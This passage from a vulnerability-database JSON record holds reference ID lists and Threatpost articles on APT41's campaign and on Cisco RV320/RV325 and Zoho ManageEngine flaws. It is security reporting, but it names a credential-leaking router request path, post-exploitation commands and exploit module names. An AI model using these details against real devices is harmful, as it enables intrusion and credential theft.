"THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833"]}, {"type": "zdt", "idList": ["1337DAY-ID-32052", "1337DAY-ID-32053", "1337DAY-ID-32070", "1337DAY-ID-32437", "1337DAY-ID-32438", "1337DAY-ID-32439", "1337DAY-ID-32455", "1337DAY-ID-32569", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34095"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974"]}, {"type": "attackerkb", "idList": ["AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "canvas", "idList": ["CONFLUENCE_MACRO_LFI"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0073", "CPAI-2019-0076", "CPAI-2019-0506", "CPAI-2019-1653", "CPAI-2020-0118"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC"]}, {"type": "cisco", "idList": ["CISCO-SA-20190123-RV-INFO", "CISCO-SA-20190123-RV-INJECT"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189"]}, {"type": "dsquare", "idList": ["E-686"]}, {"type": "exploitdb", "idList": ["EDB-ID:46243", "EDB-ID:46262", "EDB-ID:46655", "EDB-ID:46731", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:2EB81502D633A85397D825E99A410AAC", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:B394E05FC4834992E8F05135E3087CAD"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "6787DC40-24C2-5626-B213-399038EFB0E9", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "721C46F4-C390-5D23-B358-3D4B22959428", "78155987-ACB5-51CD-99EB-FF372456D94D", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "hackerone", "idList": ["H1:536130", "H1:541858"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:EXPLOIT/LINUX/HTTP/CISCO_RV32X_RCE", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR"]}, {"type": "mssecure", "idList": ["MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["CISCO-SA-20190123-RV-INFO_DIRECT.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151311", "PACKETSTORM:151312", "PACKETSTORM:151313", "PACKETSTORM:151374", "PACKETSTORM:152260", "PACKETSTORM:152261", "PACKETSTORM:152262", "PACKETSTORM:152305", "PACKETSTORM:152568", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156730"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019"]}, {"type": "securelist", "idList": ["SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:F4C5F017FE55E40DF427E75D001F7D91"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833"]}, {"type": "zdt", "idList": ["1337DAY-ID-32052", "1337DAY-ID-32053", "1337DAY-ID-32070", "1337DAY-ID-32437", "1337DAY-ID-32438", "1337DAY-ID-32439", "1337DAY-ID-32455", "1337DAY-ID-32569", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34095"]}]}, "exploitation": null, "vulnersScore": 0.3}, "_state": {"dependencies": 1660004461, "score": 1659957065}, "_internal": {"score_hash": "29315af15ec3d9b192147e9d61745692"}}

{"threatpost": [{"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[![APT41 timeline ](https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/24173101/DUO_320x50.jpg)](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-04T12:27:29", "description": "UPDATE\n\nMalicious scanning activity targeting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers is underway, with a swell of opportunistic probes looking for vulnerable devices ramping up since Friday.\n\nAccording to Bad Packets Report\u2019s honeypot data, cyberattackers are targeting a pair of just-patched vulnerabilities that allow remote unauthenticated information disclosure ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) leading to remote code-execution (CVE-2019-1652) on the routers. There are more than 9,000 routers open to the attack, the firm found.\n\nThe first vulnerability exists in the web-based management interface for RV320/RV325; a simple GET request for /cgi-bin/config.exp returns full details of the device\u2019s configuration settings, including administrator credentials (the password is hashed though).\n\n\u201c[This] could allow an unauthenticated, remote attacker to retrieve sensitive configuration information,\u201d explained researcher Troy Mursch, in [an advisory](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) published over the weekend. \u201cAll configuration details of the RV320/RV325 router are exposed by this vulnerability.\u201d\n\nBad Packets Report\u2019s own scanning efforts [using BinaryEdge](<https://www.binaryedge.io/>), which canvassed 15,309 unique IPv4 hosts, determined that 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653: Broken down, it works out to 6,247 vulnerable out of 9,852 Cisco RV320 routers scanned; and 3,410 vulnerable out of 5,457 Cisco RV325 routers scanned.\n\nThese are mostly located in the United States, Mursch said, though overall, vulnerable devices were found in 122 countries and on the networks of 1,619 different ISPs \u2013 making for a significant, global attack surface.\n\nOnce a malefactor has gained admin credentials, he or she can further exploit the router after signing in. The CVE-2019-1652 flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input.\n\n\u201cAn attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device,\u201d according to Cisco\u2019s [documentation](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652>). \u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root.\u201d\n\nA [proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) for remote code-execution has been detailed by researcher/grey hat David Davidson, but Mursch noted that there are mitigating circumstances.\n\n\u201cIn regards to how the routers are going to be exploited once compromised, it\u2019s not fully known yet,\u201d he told Threatpost. \u201cAt this point, I can only confirm threat actors are only taking inventory of vulnerable devices by scraping the leaked configuration files and credentials. The actual damage may be limited due to the capabilities (or lack thereof) noted by David Davidson. Only time will tell.\u201d\n\nDavidson\u2019s tweet explained:\n\n> yeah basically anyone unpatched is probably fucked. except for the fact the 'wget' on these boxes is broken half the time and its probably beyond your average skid to cross compile their mirai bot for the correct mips64rev2 shit (for now)\n> \n> \u2014 some person (@info_dox) [January 26, 2019](<https://twitter.com/info_dox/status/1089002947076333570?ref_src=twsrc%5Etfw>)\n\nOne interesting point to note is that the vulnerability also results in the SSID being leaked.\n\n\u201cThis allows attackers to use services such as WiGLE to determine the physical location of the router,\u201d Mursch told Threatpost.\n\nThis was also the case in the recent [Orange Livebox vulnerability](<https://threatpost.com/19k-orange-livebox-modems-open-to-attack/140376/>), Mursch pointed out. That means that an attacker can mount a variety of on-location proximity hacks, and it also allows easier botnet-building given that many admins use the same credentials for the administrative panel as well as the WiFi network \u2014 opening the door to more devices to enslave.\n\nThe vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco\u2019s patch should be applied immediately, and administrators should change their devices\u2019 admin and WiFi credentials to thwart any compromise that may have already occurred.\n\n_This post was updated at 6:13 p.m. ET on Jan. 28, with comments from Mursch._\n", "cvss3": {}, "published": "2019-01-28T16:04:07", "type": "threatpost", "title": "Active Scans Target Vulnerable Cisco Routers for Remote Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T16:04:07", "id": "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "href": "https://threatpost.com/scans-cisco-routers-code-execution/141218/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:00:33", "description": "After a botched first attempt at patching two high-severity bugs affecting its RV320 and RV325 routers, Cisco Systems is out with fresh new fixes for both devices. However, Cisco isn\u2019t out of the woods yet. On Thursday, it also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\nThe good news for Cisco was it said it finally successfully patched its RV320 and RV325 WAN VPN routers after first bungling the fix. Last week, [Cisco notified customers](<https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/>) that it had mismanaged a patch originally issued in September 2018 when it attempted to fix two router vulnerabilities ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) and [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) \u2013 both rated as being of high importance.\n\n\u201cThe initial fix for this vulnerability was found to be incomplete. The complete fix is now available in Firmware Release 1.4.2.22,\u201d wrote Cisco on Thursday, referring to ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)) a command injection vulnerability. According to the bulletin, the flaw allowed an authenticated, remote attacker with administrative privileges to execute arbitrary commands on either the RV320 and RV325 routers.\n\nFor [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), Cisco posted the exact [same status update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), notifying customers of the same firmware fix. The bug in this case is an information disclosure vulnerability \u201c[that] could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**Righting the Routers\u2019 Wrongs **\n\nInitially, the bugs were identified last September by RedTeam Pentesting and patched by Cisco on January 23. Making matters worse, on January 25, security researcher [David Davidson published proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) hacks for two routers. As customers rushed to apply the patches, hackers reportedly began attacking both routers.\n\nPart of Cisco\u2019s January fix included blacklisting the so-called client for URLs (or cURL) on the modems. CURL is a command line tool for transferring data using various protocols. Presumably, blacklisting the user agent for cURL would keep attackers out. That wasn\u2019t the case, and Cisco critics chimed in, stating that the blacklisting could easily be bypassed.\n\nhttps://twitter.com/hrbrmstr/status/1110995488235503616\n\nLast Wednesday, Cisco admitted as much, relaying a message to customers that both router patches were \u201cincomplete\u201d and that both were still vulnerable to attack. It added that in both cases, \u201cfirmware updates that address [these vulnerabilities] are not currently available.\u201d It added there are no workarounds that address either vulnerability.\n\n**New Medium-Severity Headaches for Cisco **\n\nAlso Thursday, Cisco reported two new medium-severity bug also affecting its RV320 and RV325 routers, both with no patches available. One bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)) is tied to weak credential encryption use by both routers. The other is insufficient validation of a user-supplied input bug ([CVE-2019-1827](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-xss>)), also affecting both routers.\n\nBoth reports warn, \u201cThere are no workarounds that address this vulnerability.\u201d Cisco does not mention anything about a patch in either advisory.\n\nAs for the weak credential vulnerability, it \u201cexists because affected devices use weak encryption algorithms for user credentials. An attacker could exploit this vulnerability by conducting a man-in-the-middle attack and decrypting intercepted credentials. A successful exploit could allow the attacker to gain access to an affected device with administrator privileges,\u201d according to Cisco.\n\nAs for the input bug, Cisco warns, \u201cA vulnerability in the Online Help web service of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the service.\u201d\n\nAs for exploitation of the bugs, Cisco said of the weak credential bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)): \u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the public announcement or malicious use of the vulnerability that is described in this advisory.\u201d It thanked GitHub user 0x27 for reporting the vulnerability.\n\nCisco said it was not aware of any public exploits tied to the input validation bug.\n\nCisco did not return a request to comment for this article.\n", "cvss3": {}, "published": "2019-04-05T20:29:09", "type": "threatpost", "title": "Cisco Finally Patches Router Bugs As New Unpatched Flaws Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1827", "CVE-2019-1828"], "modified": "2019-04-05T20:29:09", "id": "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "href": "https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with 